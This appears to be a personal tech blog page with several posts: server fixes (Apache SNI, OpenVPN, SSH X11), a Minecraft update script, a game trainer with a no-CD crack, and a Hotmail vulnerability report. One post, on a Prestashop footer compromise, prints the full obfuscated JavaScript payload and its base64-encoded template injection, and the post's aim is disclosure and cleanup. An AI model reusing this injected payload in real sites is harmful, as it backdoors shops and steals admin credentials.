HOW GEEK!

Author: kevin

  • Apache 2.4.64, SNI, and 421 Misdirected Request: cause and fix

    After upgrading to Apache 2.4.64 (or after applying linux vendors updates) many sites behind a reverse proxy started returning 421 Misdirected Request. The practical cause is simple: when your proxy makes an HTTPS connection to Apache, Apache now expects a correct TLS SNI value that matches the HTTP host. If the proxy omits SNI or sends a different name than the Host header, Apache can reject the request with 421. This change exposed default proxy settings that used to work by accident.

    What the 421 error means

    The HTTP 421 Misdirected Request status means the request reached a server that is not configured to respond for the combination of scheme and authority that you used. Browsers often reuse HTTP/2 connections across hosts if the server allows it, but Apache 2.4.64 tightened the checks so that connections without a matching SNI and Host are rejected. That is why you can see the error only on some requests or only on some subdomains after the update. The error message is the following:

    Misdirected Request

    The client needs a new connection for this request as the requested host name does not match the Server Name Indication (SNI) in use for this connection.

    Who is affected

    You are affected if a reverse proxy connects to Apache over HTTPS and does not pass SNI to the backend. This is common for nginx in front of Apache, HAProxy with HTTPS backends, and some CDNs or load balancers that re-encrypt to the origin. Panels that pair nginx and Apache (for example EA-Nginx on cPanel, Plesk, Hestia, and similar) were among the first to report 421 after the update.

    Fix: send the correct SNI to Apache and keep it consistent with Host

    The fix is to enable SNI on the upstream HTTPS hop and make its value match the HTTP Host that Apache should serve. Keep the connection private (VPC, VLAN, VPN, or same host) if you do not want the name visible outside your network. Do not roll back the Apache security update. Configure your proxy once and the 421 errors stop.

    nginx to Apache over HTTPS

    Enable SNI toward the backend and keep Host consistent.

    location / {
    proxy_pass              https://backend.example.com;
    proxy_set_header        Host $host;
    proxy_ssl_server_name   on;      # send SNI
    proxy_ssl_name          $host;   # SNI value
[..]
}

    HAProxy to Apache over HTTPS

    Pass the Host header as the SNI value on the TLS connection to Apache. Add verification settings that match your policy.

    backend app
    http-request set-header X-Forwarded-Proto https
    server app1 127.0.0.1:443 ssl sni req.hdr(Host)

    Apache to Apache with mod_proxy over HTTPS

    Use an https URL whose hostname is the site you want to serve so that Apache sends that name as SNI to the backend.

    SSLProxyEngine on
ProxyPass        / https://site.example.com/
ProxyPassReverse / https://site.example.com/

    How to test and confirm

    From the proxy host, curl the backend using the public hostname and the backend IP to confirm that SNI and Host agree. Watch your Apache error log for messages about missing SNI or a vhost mismatch while you test.

    curl -vk https://example.com/ --resolve example.com:443:127.0.0.1

    FAQ

    The 421 you see is produced by the stricter SNI and authority checks added around 2.4.64 and enforced by HTTP/2 handling. The cure is to send a correct SNI on the upstream connection and keep it consistent with Host.

    Do I need to verify the backend certificate for SNI to matter? No. Apache uses SNI during the TLS handshake to pick the correct SSL vhost and certificate before it even reads the HTTP request. Certificate verification by the proxy is a separate operational choice. The important part for avoiding 421 is that the SNI you send and the Host header you send resolve to the same Apache vhost.

  • Minecraft Linux Server Auto-Update

    Keeping your Minecraft Bedrock Dedicated Server up to date is essential for performance, stability, and player compatibility. In this guide, we’ll show you how to set up a lightweight Bash script that checks for new server versions and installs them, all while preserving your world and configuration files.

    Step 1: Install Dependencies

    sudo apt update
sudo apt install curl jq unzip rsync wget

    Step 2: Create the Update Script

    Save the following as ~/update-bedrock.sh:

    #!/usr/bin/env bash
set -euo pipefail

HOME_DIR="$HOME"
INSTALL_DIR="$HOME_DIR/bedrock-server"
TMP_DIR="$HOME_DIR/bedrock-tmp"
API_URL="https://net-secondary.web.minecraft-services.net/api/v1.0/download/links"
ZIP_NAME="bedrock.zip"

command -v jq >/dev/null || { echo "jq is required"; exit 1; }

echo "Fetching version info..."
DATA=$(curl -fsSL "$API_URL")
DOWNLOAD_URL=$(echo "$DATA" | jq -r '.result.links[] | select(.downloadType == "serverBedrockLinux") | .downloadUrl')
VERSION=$(basename "$DOWNLOAD_URL" | grep -o '[0-9.]\+')

[[ -z "$DOWNLOAD_URL" || -z "$VERSION" ]] && { echo "Failed to extract URL/version"; exit 1; }

[[ -f "$INSTALL_DIR/bedrock-server.version" && "$(cat "$INSTALL_DIR/bedrock-server.version")" == "$VERSION" ]] && {
  echo "Already up to date"
  exit 0
}

mkdir -p "$TMP_DIR"
wget -q -O "$TMP_DIR/$ZIP_NAME" "$DOWNLOAD_URL"
unzip -t "$TMP_DIR/$ZIP_NAME" >/dev/null || { echo "ZIP test failed"; exit 1; }
unzip -oq "$TMP_DIR/$ZIP_NAME" -d "$TMP_DIR/unpacked"

[[ -x "$TMP_DIR/unpacked/bedrock_server" ]] || { echo "Missing server binary"; exit 1; }

rsync -a --delete \
  --exclude='server.properties' \
  --exclude='permissions.json' \
  --exclude='whitelist.json' \
  --exclude='ops.json' \
  --exclude='allowlist.json' \
  --exclude='valid_known_packs.json' \
  --exclude='worlds/' \
  "$TMP_DIR/unpacked/" "$INSTALL_DIR/"

echo "$VERSION" > "$INSTALL_DIR/bedrock-server.version"
rm -rf "$TMP_DIR"
echo "Updated to version $VERSION"

    Step 3: Make It Executable

    chmod +x ~/update-bedrock.sh

    Step 4: Automate with Cron (Optional)

    Edit your crontab with crontab -e and add this line to check daily at 3 AM:

    0 3 * * * ~/update-bedrock.sh >> ~/bedrock-update.log 2>&1

    Done ✅

    You now have a self-maintaining Minecraft Bedrock server that stays updated automatically!

  • Premier Manager 97 98 / PC Futbol 5 6 Trainer

    This is a trainer i made a long time ago with a friend for the PC Futbol / Premier Manager series. I plan on adding more to it everytime i find time 🙂

    If you have suggestions, please leave them in the comments!

    Here is the list of features:

    • No CD fix/crack(PM 98, PCF 5, PCF 6)
    • Remove free space errors (PM 97, PM 98)
    • Unlimited transfers at a time (PM 97)
    • Sign/align unlimited extra comm players (PM 97, PM 98, PCF 5, PCF 6)
    • Sign players from teams with few players (fix the bug known as  “Romario bug”) (PM 97)
    • Players/Clubs always accept transfer offers (PM 97, PCF 5)
    • Scout search less restrictive (PM 97)

    Download latest version:

    Note: In Premier Manager 98 if you get the error “the game can’t be saved”, because you didn’t use the installer, you just need to create the folder “TACTICS” in the game folder.

    Changelog:

    Version 0.14

    Added “Sign unlimited extra-comm players” for Premier Manager 98

    Added “Align unlimited extra-comm players” for Premier Manager 98

    Version 0.13

    Added “No CD check” for Premier Manager 98

    Added “Remove free space errors” for Premier Manager 98

    Version 0.12

    Initial release

  • Check Akismet queue offline

    If you need to run akismet on a big queue, you can do it with this code and run it from the command line. Drop it at the root of your wordpress install (where is wp-config) and run it with the command line php.

    <?php
    require_once dirname(__FILE__) . “/wp-load.php”;
    if(!function_exists(‘get_plugins’)) {
    require_once ( ABSPATH . ‘wp-admin/includes/plugin.php’);
    }
    require ABSPATH . ‘wp-content/plugins/akismet/class.akismet-admin.php’;
    $_GET[‘recheckqueue’]=true;
    $_REQUEST[‘action’]=’akismet_recheck_queue’;
    $zz=new Akismet_Admin();
    $zz->recheck_queue();
    ?>

    (Edit: this shouldn’t be needed in newer versions of Akismet as you can do it from the panel).

  • Hotmail security hole plugged silently, no communication, no customer service

    A vulnerability in the Hotmail password reset pages, that allowed hackers to get access to ANY hotmail/MSN account, has been widely exploited over the past week.

    I found a video on Youtube dated April 12, which describes the security hole, which is trivial and only needs the modification of 1 email field during a request to the password reset page, when exploiting it , the password reset link would then be sent to an arbitrary email.

    My MSN/passport.net accounts (and many of my contacts) have been hacked briefly during the night from April 17 to April 18, i then informed MSRC about an unknown vulnerability in the password reset page, and it seems the vulnerability was plugged on April 19 or 20.

    What surprises me is the communication of Microsoft, there has been no public statement about the vulnerability, and all the hacked accounts have been permanently blocked and need to be unblocked manually by Microsoft employees. Some have been unblocked after asking on the forums answers.microsoft.com, but thousands remain blocked (every password reset, either through email, SMS or through the customer service don’t help).

    We are on April 24 and most of the users don’t even know this is the fault of Microsoft and i’m surprised they didn’t bother to help the hacked customers to get back their accounts, this is another big disappointment about the Microsoft security, communication and ethics.

    Other sites talking about the vulnerability:

    http://syria.telecomix.org/

    http://www.whitec0de.com/new-hotmail-exploit-can-get-any-hotmail-email-account-hacked-for-just-20/

    http://hackingworldnews.blogspot.fr/2012/04/yet-another-hotmail-exploit-for-avril.html

     

    UPDATE 26/04:

    MSRC tweeted about the fix:

    https://twitter.com/#!/msftsecresponse/status/195568235654021121

    Got back my account after contacting the customer service, for this you need to follow the link on the page saying you’re blocked, and then login with a new (unblocked) account.. The mess ended.. At least, let’s hope so.

    Here is the direct link to the correct support page:

    http://windows.microsoft.com/en-us/windows-live/get-support?selectedproduct=Hotmail&selectedissue=Your%20account%20has%20been%20temporarily%20blocked&productKey=wolmain

  • Thepiratebay.se links blocked in MSN Messenger

    UPDATE 28/03/2012: TheRegister has published an article about it and it seems MS decided to unban thepiratebay!

    http://www.theregister.co.uk/2012/03/26/microsoft_censors_pirate_bay_im/

    ——–

    Looks like thepiratebay.se links are blocked in MSN messenger, anybody who tries to send a link, even of the homepage, receives back an error:

    I’d be curious to know if it has been mistakenly categorized as a site containing viruses or if it was a move from Microsoft to “hit” thepiratebay and the revenue they generate from visits.

  • Alvotech Vserver VPS with OpenVPN

    Renting a server at Alvotech and thinking about installing OpenVPN? Then follow this tutorial.

    This tutorial has been done on the default configuration of the Alvotech VPS: Debian 5 64bit, and on Debian 6 64bit.

    The specs page of the vservers show that TUN/TAP is usable, but when you rent the VPS, no TUN interface is enabled.

    The first thing is to ask the support to enable it, after they say they did, you need to reboot your server through the control panel.

    Note that you don’t need any iptable rule, ip forwarding is enabled and you cannot add any iptable rule anyway, Alvotech will enable the necessary rules on the Host.

    Then enter your server through ssh and check ifconfig, you might have something like this:

    tun2391-136 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
    inet addr:10.0.2.97 P-t-P:10.0.2.98 Mask:255.255.255.255
    UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1
    RX packets:11782 errors:0 dropped:0 overruns:0 frame:0
    TX packets:8389 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:100
    RX bytes:1258182 (1.1 MiB) TX bytes:5467118 (5.2 MiB)

    Great, now do:

    apt-get install openvpn

    cd /etc/openvpn

    mkdir easy-rsa

    cp -r /usr/share/doc/openvpn/examples/easy-rsa/* easy-rsa/

    cd easy-rsa/2.0/

    source ./vars

    ./clean-all

    ./build-key-server server

    ./build-key client1

    ./build-dh

    ln -s /etc/openvpn/easy-rsa/2.0/keys /etc/openvpn/keys

    cd /etc/openvpn

    Now create a file server.conf with this content:

    port 1194
    proto udp
    dev tun2391-136 #Your TUN device in ifconfig
    ifconfig 10.0.2.97 10.0.2.98 # your TUN interface settings in ifconfig
    ifconfig-noexec
    route-noexec
    keepalive 10 120
    persist-key
    persist-tun
    comp-lzo
    verb 3
    fragment 1200
    mssfix 1200
    ca keys/ca.crt
    cert keys/server.crt
    key keys/server.key
    dh keys/dh1024.pem
    user nobody
    group nogroup
    tls-server
    push “dhcp-option DNS 8.8.8.8”

    Restart openvpn:

    /etc/init.d/openvpn restart

    Now copy the ca.crt client1.crt and client1.key on your client, and create a client.conf file (or client.ovpn) with this content:

    client
    dev tun
    proto udp
    remote 88.88.88.88 1194 #your server ip address/port
    resolv-retry infinite
    nobind
    persist-key
    persist-tun
    ca ca.crt
    cert client1.crt
    key client1.key
    ns-cert-type server
    comp-lzo
    verb 3
    ifconfig 10.0.2.98 10.0.2.97 #change it according to the IPs of your TUN interface, notice it is the CONTRARY of the server config
    redirect-gateway
    fragment 1200
    mssfix 1200

    And now just run “sudo openvpn client.conf”, on Windows you might need to adjust the paths to something like this: “cert c:\\Users\\admin\\desktop\\client1.crt” (for the key+certs).

    If you need another client to connect, just ask the support another TUN device (they added one on my server), copy server.conf to server2.conf, modify the TUN interface IPs/name + change the openvpn port in server2.conf, and don’t forget to generate a second client certificate!

    Enjoy!

    (thanks to the support @ Alvotech for providing the details i was missing)

  • Vshare / Widdit / searchcompletion.com Adware

    Vshare plugin *IS* an adware.

    Whether you are on Mac, Windows or Linux this is the same, and you don’t even need the toolbar, only the plugin.

    I’ve installed the old version of the Vshare plugin on my Firefox, on Linux, (old version because the newest isn’t available on Linux) then some popups started to appear on sites like wikipedia.org, loaded from some files hosted on widdit.com,  and leading to search.searchcompletion.com (a quick lookup on Google shows some Windows users also see this site as their main browser page, after installing Vshare).

    Widdit belongs to an Israeli company (SimplyGen), so does Vshare. Maybe both sites are from the same company.

    At this point i don’t know if it only adds some random popups or also does other nasty things (like replacing ads). I didn’t read any other article on the subject, so i decided to write this post. If you have other info, post it in the comments!

  • Prestashop XSS Worm (footer.tpl virus)

    Today i woke up and connected to a Prestashop site i’m setting up.
    I didn’t install anything extra on it (only my custom template), also it wasn’t in search engines.
    I noticed a strange blank line in the footer.. DOH!

    When i looked, i had this code in the footer:

    <script>String.prototype.asd=function(){return String.fromCharCode;};
    Object.prototype.asd=”e”;try{for(i in{})if(~i.indexOf(‘as’))throw 1;}
    catch(q){zxc={}[i];}v=document.createTextNode(‘asd’);
    var s=””;for(i in v)if(i==’childNodes’)o=v[i].length+1;o*=2;e=eval;
    m=[120-o,99-o,116-o,34-o,102-o,34-o,63-o,34-o,112-o,103-o,121-o,34-o
    ,70-o,99-o,118-o,103-o,42-o,43-o,61-o,120-o,99-o,116-o,
    34-o,122-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,104-o,116-o,
    113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,79-o,99-o,
    118-o,106-o,48-o,104-o,110-o,113-o,113-o,116-o
    ,42-o,102-o,48-o,105-o,103-o,118-o,70-o,
    99-o,118-o,103-o,42-o,43-o,49-o,52-o,43-o,45-o,59-o,57-o,
    43-o,61-o,34-o,120-o,99-o,116-o,
    34-o,123-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,
    104-o,116-o,113-o,111-o,69-o,106-o,
    99-o,116-o,69-o,113-o,102-o,103-o,42-o,102-o,48-o,105-o
    ,103-o,118-o,74-o,113-o,119-o,116-o,
    117-o,42-o,43-o,45-o,59-o,57-o,43-o,61-o,102-o,113-o,101-o
    ,119-o,111-o,103-o,112-o,118-o,
    48-o,121-o,116-o,107-o,118-o,103-o,42-o,36-o,62-o,107-o,104-o
    ,116-o,99-o,111-o,103-o,34-o,
    117-o,116-o,101-o,63-o,41-o,106-o,118-o,118-o,114-o,60-o,49-o,
    49-o,101-o,110-o,107-o,101-o,
    109-o,111-o,103-o,36-o,45-o,122-o,45-o,123-o,45-o,36-o,48-o,104-o,
    107-o,110-o,103-o,99-o,120-o,103-o,48-o,101-o,113-o,111-o,
    41-o,34-o,121-o,107-o,102-o,118-o,
    106-o,63-o,50-o,34-o,106-o,103-o,107-o,105-o,106-o,118-o,63-o,
    50-o,64-o,36-o,43-o,61-o];
    mm=”.asd();for(i=0;i<m.length;i++)s+
    =mm(e(“m”+”[“+”i”+”]”));e(s);</script>

    And this in footer.tpl was causing it:

    {literal}base64_decode(“PHNjcmlwdD5TdHJpbmcucHJvdG90eXBlL
    mFzZD1mdW5jdGlvbigpe3JldHVybiBTdHJpbmcuZnJvbUNoYXJDb2RlO3
    07T2JqZWN0LnByb3RvdHlwZS5hc2Q9ImUiO3RyeXtmb3IoaSBpbnt9KWl
    mKH5pLmluZGV4T2YoJ2FzJykpdGhyb3cgMTt9Y2F0Y2gocSl7enhjPXt9
    W2ldO312PWRvY3VtZW50LmNyZWF0ZVRleHROb2RlKCdhc2QnKTt2YXIgc
    z0iIjtmb3IoaSBpbiB2KWlmKGk9PSdjaGlsZE5vZGVzJylvPXZbaV0ubG
    VuZ3RoKzE7byo9MjtlPWV2YWw7bT1bMTIwLW8sOTktbywxMTYtbywzNC1
    vLDEwMi1vLDM0LW8sNjMtbywzNC1vLDExMi1vLDEwMy1vLDEyMS1vLDM0
    LW8sNzAtbyw5OS1vLDExOC1vLDEwMy1vLDQyLW8sNDMtbyw2MS1vLDEyM
    C1vLDk5LW8sMTE2LW8sMzQtbywxMjItbyw2My1vLDg1LW8sMTE4LW8sMTE
    2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbywxMDQtbywxMTYtbywxMTMt
    bywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2LW8sNjktbywxMTMtbywxM
    DItbywxMDMtbyw0Mi1vLDc5LW8sOTktbywxMTgtbywxMDYtbyw0OC1vLD
    EwNC1vLDExMC1vLDExMy1vLDExMy1vLDExNi1vLDQyLW8sMTAyLW8sNDg
    tbywxMDUtbywxMDMtbywxMTgtbyw3MC1vLDk5LW8sMTE4LW8sMTAzLW8s
    NDItbyw0My1vLDQ5LW8sNTItbyw0My1vLDQ1LW8sNTktbyw1Ny1vLDQzL
    W8sNjEtbywzNC1vLDEyMC1vLDk5LW8sMTE2LW8sMzQtbywxMjMtbyw2My
    1vLDg1LW8sMTE4LW8sMTE2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbyw
    xMDQtbywxMTYtbywxMTMtbywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2L
    W8sNjktbywxMTMtbywxMDItbywxMDMtbyw0Mi1vLDEwMi1vLDQ4LW8sMTA
    1LW8sMTAzLW8sMTE4LW8sNzQtbywxMTMtbywxMTktbywxMTYtbywxMTctby
    w0Mi1vLDQzLW8sNDUtbyw1OS1vLDU3LW8sNDMtbyw2MS1vLDEwMi1vLDEx
    My1vLDEwMS1vLDExOS1vLDExMS1vLDEwMy1vLDExMi1vLDExOC1vLDQ4L
    W8sMTIxLW8sMTE2LW8sMTA3LW8sMTE4LW8sMTAzLW8sNDItbywzNi1vLD
    YyLW8sMTA3LW8sMTA0LW8sMTE2LW8sOTktbywxMTEtbywxMDMtbywzNC
    1vLDExNy1vLDExNi1vLDEwMS1vLDYzLW8sNDEtbywxMDYtbywxMTgtby
    wxMTgtbywxMTQtbyw2MC1vLDQ5LW8sNDktbywxMDEtbywxMTAtbywxMD
    ctbywxMDEtbywxMDktbywxMTEtbywxMDMtbywzNi1vLDQ1LW8sMTIyLW
    8sNDUtbywxMjMtbyw0NS1vLDM2LW8sNDgtbywxMDQtbywxMDctbywxMT
    AtbywxMDMtbyw5OS1vLDEyMC1vLDEwMy1vLDQ4LW8sMTAxLW8sMTEzLW
    8sMTExLW8sNDEtbywzNC1vLDEyMS1vLDEwNy1vLDEwMi1vLDExOC1vLD
    EwNi1vLDYzLW8sNTAtbywzNC1vLDEwNi1vLDEwMy1vLDEwNy1vLDEwNS1
    vLDEwNi1vLDExOC1vLDYzLW8sNTAtbyw2NC1vLDM2LW8sNDMtbyw2MS1v
    XTttbT0nJy5hc2QoKTtmb3IoaT0wO2k8bS5sZW5ndGg7aSsrKXMrPW1tK
    GUoIm0iKyJbIisiaSIrIl0iKSk7ZShzKTs8L3NjcmlwdD4=”){/literal}

    Also 2 PHP files were created in the upload/ and download/ folders which had the creation time set to the exact time i entered in the backend this morning!

    Apparently, Prestashop.com got compromised and somebody inserted a malicious script, which was executed in any admin’s browser window and that would make him backdoor his own site.

    All the infected shops employees’ credentials were sent to these malicious emails: samuvel_hitroy@aol.com and preop@gmx.com

    The fix:
    Be sure to delete modules/her.php
    Remove the javascript code in the end of your footer.tpl theme files.
    Be sure to create these folders:
    tools/smarty/compile/
    tools/smarty/cache/

    Put back the htaccess files of upload/ and download/

    You can clear *.php files from upload/ and download/

    Clear ALL your cache.
    Move your admin folder.
    Reset your Mysql Password.
    Reset all your employees’ passwords!

    The vulnerability has been fixed on prestashop.com.

    This shows how including external content (html) is really risky and should be avoided at all cost. External content should always be parsed and displayed safely.

    More information on this thread:
    http://www.prestashop.com/forums/topic/125798-footertpl-vulnerability/

    UPDATE: Prestashop has published an official statement and published a tool to clean an infected site:

    http://www.prestashop.com/blog/article/please_read_security_procedure/

  • xauth + (X11Forwarding Yes and X11UseLocalhost yes) == Still no Forwarding ?

    I was searching for this fix for quite some time. I couldn’t forward X anymore using “ssh -Y” or “ssh -X” on my debian server (i have xauth installed), i was always getting this error:

    ~$ xterm
xterm Xt error: Can't open display:
xterm:  DISPLAY is not set

    “X11UseLocalhost no” was making it working but this wasn’t the right solution..

    On this bug report i found out i had the same problem and the same symptoms: i had disabled ipv6 support, and this is what broke the forwarding!

    The solution is to add:

    AddressFamily inet

    in sshd_config! (or enable ipv6 again ;))